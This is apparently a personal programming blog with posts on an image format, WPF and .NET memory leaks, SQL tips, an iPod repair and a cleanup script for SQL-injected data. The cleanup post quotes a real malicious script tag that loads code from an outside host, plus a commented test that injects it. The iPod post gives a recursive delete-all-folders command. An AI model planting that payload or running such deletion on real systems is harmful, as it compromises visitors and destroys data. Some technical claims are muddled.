Friday, 1 October 2010

A better web image format

WebP+
I am excited to read about Google's efforts on the WebP format.
If we are going to work on a new image format, why not make one that loads progressively? Think back to the interlacing options of GIF, but go further than that. Much further.
If the image information were ordered in the file in such a way that a very basic, fuzzy image (with a limited colour space) could be displayed very quickly, and the image then improved as more data was downloaded, this would benefit everyone, not just mobile devices!
I'm not suggesting we repeat the "thumbnail" image efforts of other formats, where essentially the file contains two images: a tiny one followed by a larger one. No, I mean a truly progressive file format where the longer you stay connected, the more detailed the image becomes, in both resolution and colour accuracy. A smart device could sever the connection as soon as it determines that any further information would be superfluous on its display. For example, let's say you create a very detailed 1920x1200 background image for use on iMacs, you have specified in CSS that this image must scale to fill the entire HTML window, and a visitor on an iPhone comes along... As soon as that device has downloaded enough information to render this background image at 480x320, it could sever the link to the server and save oodles of bandwidth!
Conceptually it might work like this. (I read this somewhere a long time ago, so if it is already patented by some greedy corporation, then I'm sorry but we will have to come up with something better).
First send a very small header which tells the renderer the total pixel dimensions of the file and the total number of channels. If this is extensible so that arbitrary metadata can also be encoded, so much the better, but encoders must give the user (content provider) the choice of where in the file this metadata goes, defaulting to the end so that mobile devices won't have to download it first. I also advocate including a fingerprint (an MD5 hash of the entire file) in the header so that a device can determine whether it has the full content or only partial content in its cache. A simple file size or checksum is not enough, since we also want to ensure the file's integrity, including the metadata at the end. This has more to do with rights management... but I digress.
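Just to make the idea concrete, here is a rough C# sketch of the sort of thing such a header might carry. None of these field names come from any real specification -- they are purely illustrative -- and a real format would have to hash the file with the fingerprint field zeroed so the header can contain its own checksum.
using System.IO;
using System.Security.Cryptography;

// Illustrative only: a possible header for a progressive image file.
struct ProgressiveHeader
{
    public ushort Width;          // total pixel width of the full image
    public ushort Height;         // total pixel height of the full image
    public byte   ChannelCount;   // e.g. 1 = greyscale, 3 = RGB, 4 = RGBA
    public uint   MetadataOffset; // where optional metadata lives (default: end of file)
    public byte[] Fingerprint;    // MD5 of the whole file, so a cache can tell
                                  // a partial download from the complete file

    // Compute the 16-byte MD5 fingerprint of a finished file.
    public static byte[] ComputeFingerprint(string path)
    {
        using (var md5 = MD5.Create())
        using (var stream = File.OpenRead(path))
            return md5.ComputeHash(stream);
    }
}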
After the header we need to send the "average" colour for the entire image. For greyscale images this needs to be no more than 8 bits, and for colour images no more than 24 bits. If there is another channel (such as alpha) this needs to add no more than another 8 bits to store the "average" value for that channel.
Next we divide the image into four quarters and work out the average colour (and other channel) values for each quarter. We now need to send the difference between each quarter's average value and the whole image's average values. Typically these differences will be small and we can use some compression technique (perhaps Huffman, or LZW) to reduce the number of bits needed to encode these differences.
Next we divide each of the areas from the previous step into four quarters and work out the differences between each quarter's average values and the average values of the area of which it forms part. Encode these differences to reduce the number of bits sent.
We keep on repeating this process until we are sending only the differences between individual pixels' values and the average of the four pixels in the local 2x2 cell which was sent in the previous step.
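To make the averaging scheme concrete, here is a minimal C# sketch of the encoder side, assuming a square, power-of-two-sized, 8-bit greyscale image held in a 2D array. All of the names are mine; this is an illustration of the idea, not a proposed implementation.
using System;
using System.Collections.Generic;

static class ProgressiveSketch
{
    // Build averages from the full image down to a single 1x1 "whole image" value.
    // Assumes a square image whose side length is a power of two.
    // After the call, levels[0] is the 1x1 whole-image average and the last level
    // is the original image.
    static List<int[,]> BuildPyramid(int[,] image)
    {
        var levels = new List<int[,]> { image };
        var current = image;
        while (current.GetLength(0) > 1)
        {
            int size = current.GetLength(0) / 2;
            var next = new int[size, size];
            for (int y = 0; y < size; y++)
                for (int x = 0; x < size; x++)
                    next[y, x] = (current[2 * y, 2 * x] + current[2 * y, 2 * x + 1] +
                                  current[2 * y + 1, 2 * x] + current[2 * y + 1, 2 * x + 1]) / 4;
            levels.Add(next);
            current = next;
        }
        levels.Reverse();
        return levels;
    }

    // Emit the stream: the whole-image average first, then, level by level,
    // the difference between each cell and its parent cell's average.
    // A real encoder would entropy-code these (typically small) differences.
    static IEnumerable<int> EmitDifferences(List<int[,]> levels)
    {
        yield return levels[0][0, 0];
        for (int l = 1; l < levels.Count; l++)
        {
            var parent = levels[l - 1];
            var child = levels[l];
            int size = child.GetLength(0);
            for (int y = 0; y < size; y++)
                for (int x = 0; x < size; x++)
                    yield return child[y, x] - parent[y / 2, x / 2];
        }
    }
}
A decoder that stops reading after n levels has, in effect, a complete (if coarse) 2^n by 2^n version of the picture, which is exactly what would let a small-screen device sever the connection early.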
The trick to making this work well is going to be in choosing the right compression algorithm. We may even need one algorithm in the early part of the file and another in the later parts, as the pattern of differences changes. Or perhaps a different algorithm for different channels (but this could be difficult to mix into one bitstream).
Some additional channels (such as refraction, reflection and bump maps) should perhaps not be mixed into the stream of colour and alpha. So the header format must be flexible enough to allow the encoder to specify which channels are mixed into which streams. This will let simple/mobile devices quickly receive the information they can work with, and defer the optional extra information, which more capable devices can fetch later in the stream.
Comments and suggestions for bit encoding are welcome!

Wednesday, 14 July 2010

Microsoft .NET events and garbage collection

Scenario
We have created a fancy WPF (using XAML) desktop application which uses N-tier design philosophy (data tier, business logic tier, presentation tier) with data binding between the user interface and the business logic, utilising value converters.
The user interface is quite complex, with lots of triggers and templates that change depending on whether the element has focus, whether the mouse is hovering over it, or the data type it is bound to (for date types we swap to a calendar control, for boolean types we swap to a check box, etc.).
This works nicely and it all sits within an MDI (multiple document interface) style application. Each document is bound to one instance of our main business logic class. Of course this object has several properties that are collections of other objects, and these collections are bound to content presenters (a XAML term for something that can repeatedly apply the same template to each element in an arbitrary collection).
The bound properties of the business logic objects were "dependency" properties (a Microsoft implementation of an Apple Objective-C concept of bindable values dating back to the early nineties). Under the hood, this means the business objects implement the INotifyPropertyChanged interface, which in turn means they have a public event called PropertyChanged that is raised whenever one of the bindable properties is changed. This event has an argument containing the name of the property (i.e. a string! value) that has changed.
The user interface then subscribes to this event so that it knows to refresh the displayed values whenever the program logic updates these properties.
The problem
When the user closes one of these documents, you would expect to see a drop in the amount of allocated memory for the application. As it is, having one document open consumes about 200MB of memory, so when it is closed and we dispose of the business logic object instance, and remove the document from the visual tree, we expect the garbage collector to do its job and return that 200MB to the operating system. Can you guess why I'm blogging about this?
Not even a request to GC.Collect() has any effect.
It turns out (thanks, ANTS Profiler) that the data bindings are at fault. Specifically, the business layer objects are prevented from being collected because the user interface bindings are still listening to their PropertyChanged events. The bindings themselves cannot be released because they are still referenced in the internal collection of PropertyChanged listeners (maintained in the business logic by auto-generated code). Catch-22.
The solution
Don't use Microsoft's dependency properties. I know it is so easy in Visual Studio to just type "propdp" then hit the Tab key and have an instant dependency property generated for you! Alas this is the last thing you should ever get in the habit of doing.
Instead, write your own light-weight bindable properties by implementing the INotifyPropertyChanged interface yourself. Declare your own PropertyChanged event. Manually handle the collection of event listeners in a List collection.
Implement the IDisposable interface (but you were doing this already, weren't you!) and in the Dispose() method, clear the list of event listeners. Problem solved; no more dangling references interfering with garbage collection!
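For what it's worth, here is a minimal sketch of the kind of hand-rolled bindable base class I mean. The class and member names are my own, not from our production code:
using System;
using System.Collections.Generic;
using System.ComponentModel;

// A light-weight bindable base class: INotifyPropertyChanged implemented by
// hand, with the listener list under our own control so Dispose() can empty it.
public abstract class BindableBase : INotifyPropertyChanged, IDisposable
{
    private readonly List<PropertyChangedEventHandler> listeners =
        new List<PropertyChangedEventHandler>();

    public event PropertyChangedEventHandler PropertyChanged
    {
        add    { if (value != null) listeners.Add(value); }
        remove { listeners.Remove(value); }
    }

    protected void RaisePropertyChanged(string propertyName)
    {
        var args = new PropertyChangedEventArgs(propertyName);
        foreach (var listener in listeners.ToArray())
            listener(this, args);
    }

    public void Dispose()
    {
        // Drop every binding that is still listening, so nothing keeps this
        // object (or the bindings themselves) alive after the document closes.
        listeners.Clear();
    }
}

// Example business property built on the base class.
public class Invoice : BindableBase
{
    private decimal total;
    public decimal Total
    {
        get { return total; }
        set { total = value; RaisePropertyChanged("Total"); }
    }
}
All the WPF binding engine needs from a plain CLR object is the INotifyPropertyChanged interface itself, so nothing changes in the XAML; the difference is that Dispose() can now empty the listener list and break the chain of references.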
It's a lot of work, depending on the number of business layer classes that can be bound to the user interface; in our case that was over 100 classes and 3000 properties.
On the plus side, the performance of the application improves three-fold (lighter-weight binding takes far less time to set up) and the memory usage drops from 179MB to 9MB after a document is closed.

Comparing SQL Server DateTime columns with SmallDateTime columns

Scenario
You have a table in SQL Server where you want to record (a) when the row was originally created and (b) when it was last modified.
For (a) you aren't interested in millisecond accuracy, so you may choose the SmallDateTime data type. You use the getDate() function as the default value for this column to automatically insert the current date and time (accurate to the minute) when a row is inserted.
For (b) you are interested in millisecond accuracy (for replication purposes, perhaps), but you definitely want the seconds so that you can match it up with, say, a web server log file to find out who did it and where they were (i.e. page URL etc.). You use the getDate() function as the default value for this column to automatically insert the current date and time (to millisecond accuracy) when a row is inserted, and create a trigger to also set it on updates.
Now let's say you want to identify all the rows that have never changed since they were created.
Obvious solution
Select * from table where a = b
Wrong. Because of the difference in data types, (a) will almost never equal (b) even if no row has ever been altered! This query returns zero rows, when we know for a fact there must be at least one row that has never been altered.
Less obvious solution
Select * from table where year(a) = year(b) and month(a) = month(b) and day(a) = day(b)
This query finds one row (out of 9000 in the table) in around 9 seconds. Not great.
Better solution
Select * from table where dateDiff(day, a, b) < 1
This query finds one row (out of 9000 in the table) in around 0.4 seconds. Now put that in your pipe and smoke it!
For the record, I was testing on MS SQL Server 2005 Express (64 bit) running on Windows 2008 R2 x64 as a virtual guest of Windows 2008 R2 Hyper-V x64 on a physical Dell server with two Intel Xeon quad core CPUs running at 2.6 GHz with 16 GB RAM. No other guest machines were running at the time.

Friday, 18 June 2010

What is wrong with WPF?

In 2007 I attended a Microsoft-sponsored event for the UK's Visual Basic User Group. Now, I am not a VB programmer and never have been, but this group is open-minded enough to allow C# programmers like me in. Anyway, this event was VBUG UK's annual conference and was hosted at Microsoft's Reading campus. During the two-day event, Microsoft provided many product evangelists to speak about the wonders of the Windows Presentation Foundation (WPF) and Silverlight. Naturally I was impressed. The whole event was carefully designed to impress people like me. No more would I have to allow a quality program to go out to my customers with a 1990s user interface, for that is what Microsoft's Dot Net Windows Forms platform is in essence. I could now get a proper graphics artist in to craft a quality user interface directly in XAML and then get a C# programmer to hook that up to the business logic. My end users would finally get web-like polish, and here I mean gradient fills, rounded corners, subtly animated buttons and other controls... Really, it was almost programmer's porn!
Microsoft made a big thing about how sorry they were that they had neglected the graphics processor in the PC. Apparently the GPU manufacturers had been hard at work creating ever faster chips with 2D and 3D acceleration, spurred on by a growing home gaming market, but all these business desktop PCs had the same chips in them, sitting idle 99% of the time! Finally, Microsoft was going to let us developers write software in Dot Net that utilised these fantastic GPUs.
So I returned to the office full of inspiration and set about redesigning our company's bread-and-butter application to take advantage of all that WPF offered. Along the way, I built many small applications to try out this or that feature, like data binding, animations, custom controls, and data access via LINQ (another new Microsoft technology that came along at the same time as WPF). It all worked beautifully, and fast, and used little memory... all the right things a software architect wants to know. I even wrote a few small applications to stress-test the system, and it worked reasonably well. Not as well as Windows Forms did, but then WPF did a hell of a lot more under the hood to make the user experience much richer. So it was a trade-off I was willing to accept. So we hired two more C# programmers on the spot.
Wind the clock forward two and a bit years, and my product is now ready to be unleashed on the world. Okay, maybe not the world, just those companies specialising in building social housing in the UK. A niche market really. A market that has evolved over the last three years. A market where these not-for-profit organisations have become more efficient at building more social houses for less grant money. A sector which has wholly embraced virtual server technology and thin-client computing. Thin-client devices with 128MB of RAM running some Linux flavour that boots up in 5 seconds flat and immediately loads Citrix WinFrame or something. Devices that don't have graphics accelerators. Devices that are wholly inappropriate for WPF. So now I have a fantastic application, which cost an astronomical amount of money to develop, that none of my customers can use. Oh sure, it works on their Citrix servers, just very, very slowly, because neither the servers nor the clients have any hardware graphics acceleration.
Now that I have lifted my head out of the trenches (so to speak, for didn't you know that programming can be bloody harsh, like a war almost) and looked around, I find everyone else has stopped developing for the desktop. All the major development is now in the browser. I hear buzz words like JavaScript (again? is this really making a comeback?), AJAX (not again, I thought this died a well-deserved death in 2005!), Python (what, from the 1980s?), Google App Engine, Amazon S3, Amazon EC2, Microsoft Azure, and so on... So instead of redesigning the wheel like Microsoft did with WPF, it seems everyone else decided just to improve the browser. While Microsoft spent six years doing nothing with Internet Explorer, the other browser vendors started to implement CSS3 and HTML5. When Microsoft finally woke up and decided that IE was dying, they rewrote large sections of rotten code and produced IE8, the most secure browser on the planet (for about two weeks, until the hackers cracked the weak security), also the fastest Microsoft browser ever (still 25% slower on most tests than Google Chrome), and supporting five features from the HTML5 draft specification (okay, most other browsers support well over 90% of the HTML5 features).
And I am wondering not so much what is wrong with WPF, but when Microsoft lost the plot. Was it when Bill Gates semi-retired a few years ago? Was it when he completely retired? I'm shocked. I have always been a Microsoft fanboy, and wouldn't have anything to do with Apple or Unix. Novell, Sun, IBM and Apple have always been the big bad greedy bunch in my eyes. But in 2001 I got an iPod for a Christmas present. Right off the bat I had problems with it -- it was made by Apple after all, and required me to use iTunes on my PC instead of Windows Media Player (my favourite). The iPod itself was fine; it was iTunes that I hated. Not just me, apparently: plenty of other people complained about iTunes, and it has been improved tremendously over the years. It is now my favourite media player. Maybe because I now have an iPhone in my pocket, another iPod that permanently lives in my car, and a little one I take into the gym with me... And I now have an iMac at home on which iTunes really shines. It turns out that the problems I had with iTunes were really just down to iTunes not finding support in the Windows operating system for things that were supported in Mac OS. So Apple is still very greedy in my eyes, but I love the quality and intuitive usefulness of their products, which is a trade-off that I am willing to accept.
My own company's email has been moved away from an in-house Microsoft Exchange server into Google Mail (Premier Apps), and I must say, it has been a vast improvement. It turns out that email is not really an application that should be hosted anywhere but in the cloud. Really, if you think you can host it on-site, think again. You are just wasting your time and money.
Back to WPF. Surely if my customers have such light-weight client devices that can't run WPF, then they will also struggle with rich web 2.0 applications? Yes, at the moment they do. But Citrix (and VMware) are working on improving the remote desktop protocol to allow smoother animated web browsing in thin-client setups.
They are not working on speeding up WPF, though, as that is a proprietary Microsoft technology; the problem is not that Citrix or VMware don't want to improve this, it is just that Microsoft sees them as competitors to its own Windows 2008 Application Streaming product, and therefore won't cooperate. So how about Windows 2008 Application Streaming? How well does that do in thin-client setups? There's only one way to find out, I said. So we bought a new server and installed Win2008R2 in the application hosting role. We bought a couple of Windows XP thin-client PCs (a lot more expensive than the Citrix/Linux versions), upgraded the Remote Desktop Clients to version 6 and did some WPF testing. Need I tell you the results? No, I'm not going to depress you any further. Even if I could persuade all my customers to upgrade their two-year-old thin-client PCs to the Windows versions, they still would not accept me slowing down my application's user interface.
So what really is wrong with WPF then?
1) Memory. Microsoft designed this technology back in the day before they lost the plot, when a dream of Windows on every business desktop (not a thin-client desktop, mind you) was a realistic vision. If every user had a PC with 2 or 3GB of RAM, then what's a few megabytes of overhead per form, and a few kilobytes of overhead per control, per style (skin), per template, per language, per colour, etc.? In reality these all add up quickly, and once you have built a decent-sized business application, you need a couple of gigabytes to run just this one application.
2) Graphics. Microsoft designed WPF when each desktop PC had its own GPU under the direct control of Windows DirectX. Sadly this is no longer the case. Microsoft weren't the only ones to realise these power-hungry GPUs were not being utilised in business PCs! Others noticed it too and decided to remove them completely, scaling the business PC down to just a thin device that is not only green (using little power) but also quiet (requiring no fans for cooling). Hey, let's all do our bit to save the planet!
3) Speed. Whenever Microsoft launches anything new, it is always slow for a while until hardware vendors rise to the challenge. Within a few months better hardware comes along to make the new Microsoft product work just as fast as the previous Microsoft product (which had fewer features). Microsoft designed WPF in an era when Intel and AMD still delivered annual speed increases in CPUs. Sadly they stopped doing that. Instead we now have CPUs with more cores, and more powerful cores, that still run at just around 2GHz. The only way to make use of these extra cores is by writing multi-threaded applications. Sadly, WPF is NOT MULTITHREADED.
4) Multi-threading. Like Windows Forms before it, WPF is not multi-threaded. You can start up as many background threads as you like to do anything you like, but only one thread (the one started by the operating system when it loaded your application) can touch the user interface. If any other thread tries to add, say, a node to a tree control, all hell breaks loose. This is the most serious flaw in Microsoft's whole Windows graphics subsystem. Of course there are ways around this (there is a small sketch of what that looks like at the end of this post). But they mean using queues (more memory), timers (artificial delays) and expensive cross-thread dispatching (wasteful of CPU cycles). Not to mention all the extra checks Microsoft have built in: every time you try to change anything in the user interface, Microsoft first checks to see if you should be allowed to do so -- not a security feature, just a thread-limiting measure to keep the operating system stable. I have to ask, like so many before me, why oh why can't they make the windowing system thread-safe? Do we have to wait for Windows 11? When that finally happens, will anyone still have an actual PC to install it on? I wonder.
5) Data binding syntax. This is one of the most powerful features of WPF, but also the most poorly designed, and poorly documented. It's a bit of a black art really, and many good developers make too many mistakes. Expensive mistakes, you know the kind that take weeks to debug and pin down? Yeah, those.
6) LINQ. This is a technology that makes it easy to write data queries in your favourite language -- C#. No more SQL syntax to mix in with your C#, just plain readable goodness. Bah. If only it performed at 10% of the speed of a DataReader, one could still perhaps justify its use as a good trade-off between program maintainability and end-user performance. Sadly, it is a much worse trade-off than that. LINQ creates an object instance for each row of data it retrieves, plus collections of these, and tracks changes to those instances. Great, except that if you repeat the query you get a whole new set of objects, and now you have two object instances referring to the same row of data, and they are not kept in sync! So you end up maintaining your own Dictionary collections of the same instances, which uses even more memory and wastes even more time... Even then, if another user modifies a record on the database server for which you already have an object instance in memory, you don't know it, because LINQ does not implement SQL Server 2005's notification services. Believe me, unless you are writing trivially simple applications where you don't care about other people writing to the same records that you are observing on your screen, you are far better off as a developer sticking to DataReaders and hand-crafted SQL queries.
And finally, please don't tell me I have sour grapes. I know that already, thank you.
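For the curious, here is roughly what the cross-thread hoop from point 4 looks like in practice. This is a minimal sketch only; the helper class and the TreeView parameter are made up for illustration.
using System;
using System.Threading;
using System.Windows.Controls;

static class CrossThreadHelper
{
    // A worker thread may not touch the TreeView directly; it has to marshal
    // the update back onto the UI thread via the control's Dispatcher.
    public static void AddNodeFromWorker(TreeView tree, string text)
    {
        ThreadPool.QueueUserWorkItem(_ =>
        {
            // ...do the slow background work here...
            tree.Dispatcher.BeginInvoke(new Action(() =>
            {
                // The TreeViewItem itself must also be created on the UI thread.
                tree.Items.Add(new TreeViewItem { Header = text });
            }));
        });
    }
}
Every single UI update from a background thread has to take a detour like this, which is where the extra queues, delays and wasted cycles come from.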

Sunday, 6 December 2009

How I fixed my daughter's iPod (5th generation)

Picture this. I traded my three-year-old Windows PC in for a shiny new iMac. After transferring the family's entire 300 GB music library from the old PC to the new Mac, it was time to synchronise all four of the family's iPods, and two iPhones, with the new iTunes library. All went well until my daughter plugged in her 5th generation iPod. If this kind of thing interests you, the engraving on the back identifies the model as A1236, but the software on the front identifies it as MA978.
Here's what happened. Plugging it into the iMac caused the usual icon to appear on the desktop, labelled Marie's iPod. iTunes was already launched, but even after a few moments more than what I would usually consider reasonable, it still didn't show up under the DEVICES node in the tree. So I quit iTunes and re-launched it. Same result. So I restarted Mac OS X, with the same result. So I then reset the iPod (holding down the MENU and SELECT buttons for more than six seconds until the Apple logo appeared) and hurrah! it showed up in iTunes. But, alas, that was only the first hurdle. After selecting the right playlist and verifying the iPod already had the latest version of its firmware (it had), it was time to click the Sync button. And nothing happened, other than the message "Syncing iPod..." appearing in iTunes and the actual iPod reverting to displaying its main menu as if someone had "ejected" it. After a long while an annoying message popped up over iTunes informing me that it was "Looking for iPod...". You know the type of old-school error message dialog box that you can't dismiss or even move out of the way. While this box is being displayed, you can't do anything else with iTunes. All you can do is wait for the timeout, which is only 120 seconds but feels like hours!
Anyway, I won't bore you with all the things I tried (things that are suggested by Apple's support, no less) but which failed, so here's the solution. Find a Windows machine. I know what I am trying to tell you here is probably very easy to do with a Mac and a terminal window, but life's too short to find out how (I did Google it for an hour and gave up).
Find a Windows machine and plug in the iPod. Wait for the AutoPlay pop-up that asks you if you want to view the files on drive X (where X is somewhere between D and Z). Make a note of the drive letter and close the pop-up. Open a DOS box or command prompt window. Type in X: (where X is your iPod drive letter noted earlier) and press Enter. Now type in ATTRIB -H *.* and press Enter. This will unhide all the sensitive iPod folders on the drive. Now type in exactly this: FOR /D %A IN (*.*) DO RD "%A" /S/Q and press Enter. This will remove all the folders and their contents, and may take a while. This is what the Restore button in iTunes is supposed to do, but doesn't. Click on the USB tray icon and choose to safely remove the hardware (iPod). Unplug from the Windows machine and re-plug into the iMac, and all should be well from here on. It was for me. iTunes detected the new device and asked me to name it, then asked me what music I wanted to put on it, and it worked.
The irony of the matter is that I no longer had a Windows machine to do this on, so I had to do it from a Windows XP installation in a virtual machine (using Parallels) on the iMac itself!

Saturday, 28 November 2009

Project for 28 Nov 2009

Write an IrfanView clone for Mac OS X. Hmm, should I use Cocoa in Xcode for this?

Thursday, 22 October 2009

How to remove SQL Server code injections in a hurry?

So you suddenly find that your web server has been compromised. How? Who knows. In my case we had an ASP.NET website which used the default settings for ViewState (i.e. sent to the client as a hidden form field, expecting the client to return it unaltered when the form is submitted). Of course, the default settings (recommended by Microsoft) leave IIS wide open to an exploit called SQL injection. Some crafty buggers discovered how to do this, and they've been crawling the web looking for ASPX pages and throwing all sorts of nasty stuff into the ViewState fields until they hit pay dirt...

So, what's the harm? This virus discovers the names of all the text columns in all the tables in all the database(s) to which the website has access, then appends a string like <script src="http://www.doubleclickr.ru/index.js"></script> to every value in each of those columns. Your website may well return some of these text fields back to the client as HTML to be displayed, and that's when the problem starts for the client. The client's browser interprets this HTML coming from your site as a legitimate request to fetch a mash-up script from DoubleClick (or whatever), and that script then tries to turn the client's PC into a zombie that obeys the bidding of the Russian Mafia (or whoever controls the virus). Will the client blame you? For sure they will, because you are supposed to ensure your server is virus-free, right? Well, with this kind of attack, your server is not itself running any virus code, and therefore no anti-virus program running on your server will pick up this 'infection' in the data. Tricky one.

So here is a little SQL script to create a procedure that will remove such a string from every text field in every table of the current database. This script employs much the same tricks to discover all the text fields as I'm sure the virus must be employing.
Create procedure RemoveSqlInjections
(
    @remove nVarChar(4000) = '<script src=http://www.doubleclickr.ru/index.js></script>'
)
as

/*

Inject one test...
-------------------

Update  users
set     messageText = messageText + @remove
where   userId =
(
    Select top 1 userId
    from         users
    where        messageText is not null
)

-------------------
*/

Declare @sql nVarChar(max),
        @table nVarChar(64),
        @column nVarChar(64),
        @value nVarChar(128),
        @count int

Set noCount on

Declare injectionRemover cursor for
Select  [table],
        [column],
        case when [convert] is not null
            then 'convert(' + [convert] + ', ' + [column] + ')'
            else [column]
        end as [value]
from
(
    Select      '[' + a.name + ']' as 'table',
                '[' + b.name + ']' as 'column',
                case
                    when b.xType in (98,99) then 'nVarChar(4000)'
                    when b.xType = 35 then 'varChar(8000)'
                end as 'convert'
    from        sysobjects a
    inner join  syscolumns b
        on      a.id = b.id
    where       a.xtype = 'U'
        and     b.xtype in (1,6,7,35,98,99,167,175,231,239)
) c
order by 1

Open injectionRemover

While 1=1 begin
    Fetch next from injectionRemover into @table, @column, @value
    If @@fetch_status <> 0 break

    Set @sql =  'Update ' + @table +
                ' set ' + @column +
                ' = replace(' + @value + ', ''' + @remove + ''', '''') where ' +
                @value + ' like ''%<script%'''

    Exec(@sql)
    Set @count = @@rowCount
    If @count > 0 begin
        Set @sql = 'Replaced ' + convert(nVarChar(10), @count) + ' occurrence(s) in ' + @table + '.' + @column
        Print @sql
    end
end

Close injectionRemover
Deallocate injectionRemover
After creating the procedure, just run it. With no parameters it will remove the same nasty string that infected my server, but you can supply a single parameter like so:
Exec RemoveSqlInjections '<script src="some other nasty thing"></script>'
The replacement is not case-sensitive by default, but if your server's collation is binary or some other case-sensitive variant, then watch out for case variations.